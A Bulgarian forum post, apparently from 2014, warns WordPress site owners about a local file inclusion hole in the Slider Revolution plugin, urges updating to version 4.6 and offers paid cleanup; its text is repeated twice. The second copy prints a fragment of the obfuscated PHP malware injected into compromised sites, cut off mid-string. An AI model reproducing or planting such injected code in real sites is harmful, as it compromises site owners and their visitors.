ktomov
Premium
Гледайте сега.
Начетох се на мнения, как wordpress не ставал за нищо. Как било по-добре да се ползват къстъм решения, които струват ХХХХ лв. за 5 страници и прочие.
Проблема изобщо не е в самият CMS. Всъщност е, но от части. Защо от части? Защото е най-масово ползваният, съответно атаките срещу него са най-масирани, съответно и опитите за пролука в сигурността му са най-големи. Никой няма да тръгне да търси дупка в къстъм решението ти, просто защото му е през Х*Я, при положение, че може да намери такава в десетки милиони и да се възползва.
Та по темата, за тези които не следят (вярвам са много). Беше открит local file inclusion дупка в един от най-масово ползваните слайдъри - Slider Revolution, което е premium plugin (ревящите против wordpress, време е да се обадите и да кажете, как дори платеното се пробива).
Та дупката получи популярност преди седмица-две, като я има от месеци. Закърпена е преди 8, ама има мързеливи уебмастъри, които не си поглеждат сайтовете и не ъпдейтват - както темите, така и добавките, било то платени или безплатни.
Днес чистих два такива сайта, с инклуднат код в хедърите. Време е да се поразровите и вие. Информация за дупката - четете тук: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Според автора е закърпена преди 29 версии още февруари. Проблема е, че мнозина от вас/нас си мислите/мислим, че като пуснем един сайт, може да си го оставим ей така на самотек. Това се и случва, докато нещо не се строши, а ходи после се оправяй.
Та, да сте наясно - тестват, и ако ударят златото заразяват всеки сайт с нещо приличащо на:
Във всеки пхп файл. Прегледайте кога последно са ви модифицирани файловете. Ъпдейтнете слайдъра към последната актуална версия 4.6 и спете спокойно.
Имайте предвид, че добавката е масово разпространена, и много теми, които не са ъпдейтнати, ползват слайдъра с дупка. Погледнете си сайтовете докато е време, да не ревете после.
П.П. Предлагам услугите си за почистване на сайтовете, ако ви е мързяло да ъпдейтвате, когато е било време. Цената е приемлива
Начетох се на мнения, как wordpress не ставал за нищо. Как било по-добре да се ползват къстъм решения, които струват ХХХХ лв. за 5 страници и прочие.
Проблема изобщо не е в самият CMS. Всъщност е, но от части. Защо от части? Защото е най-масово ползваният, съответно атаките срещу него са най-масирани, съответно и опитите за пролука в сигурността му са най-големи. Никой няма да тръгне да търси дупка в къстъм решението ти, просто защото му е през Х*Я, при положение, че може да намери такава в десетки милиони и да се възползва.
Та по темата, за тези които не следят (вярвам са много). Беше открит local file inclusion дупка в един от най-масово ползваните слайдъри - Slider Revolution, което е premium plugin (ревящите против wordpress, време е да се обадите и да кажете, как дори платеното се пробива).
Та дупката получи популярност преди седмица-две, като я има от месеци. Закърпена е преди 8, ама има мързеливи уебмастъри, които не си поглеждат сайтовете и не ъпдейтват - както темите, така и добавките, било то платени или безплатни.
Днес чистих два такива сайта, с инклуднат код в хедърите. Време е да се поразровите и вие. Информация за дупката - четете тук: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Според автора е закърпена преди 29 версии още февруари. Проблема е, че мнозина от вас/нас си мислите/мислим, че като пуснем един сайт, може да си го оставим ей така на самотек. Това се и случва, докато нещо не се строши, а ходи после се оправяй.
Та, да сте наясно - тестват, и ако ударят златото заразяват всеки сайт с нещо приличащо на:
PHP:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $ndgljtvgpa = '5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;ut%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5cy33]65]y31]53]y6d]281]y43]c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xИмайте предвид, че добавката е масово разпространена, и много теми, които не са ъпдейтнати, ползват слайдъра с дупка. Погледнете си сайтовете докато е време, да не ревете после.
П.П. Предлагам услугите си за почистване на сайтовете, ако ви е мързяло да ъпдейтвате, когато е било време. Цената е приемлива
Последно редактирано:
